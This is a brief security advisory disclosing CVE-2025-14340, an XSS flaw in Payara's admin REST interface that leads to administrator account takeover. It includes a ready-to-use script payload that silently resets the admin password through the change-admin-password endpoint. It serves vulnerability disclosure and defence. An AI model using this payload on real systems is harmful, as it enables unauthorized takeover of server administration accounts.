# XSS to Admin account takeover (CVE-2025-14340)

A Cross-Site Scripting vulnerability in Payara’s Administration Rest Interface, allows execution
of attacker-controlled JavaScript leading to admin account take over. Because of:

1. The panel uses HTTP Basic Auth (credentials are sent automatically by the browser for same-origin requests).
2. The change-admin-password endpoint does not require the current password to update a user’s password.
3. The change-admin-password form does not have CSRF protection.
4. An injected script using the XSS in `/management/domain/version` can POST to `/management/domain/change-admin-password` and set an attacker-chosen password for any target account — resulting in administrator account takeover.

#### Proof of Concept

URL:

`https://panel.example.com:4848/management/domain/version?<PAYLOAD>`

PAYLOAD:

```
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>
```

## Legal

AUTHORIZED USE ONLY. DeepSecurity Perú does not endorse unauthorized access and takes no responsibility for any misuse of the information provided.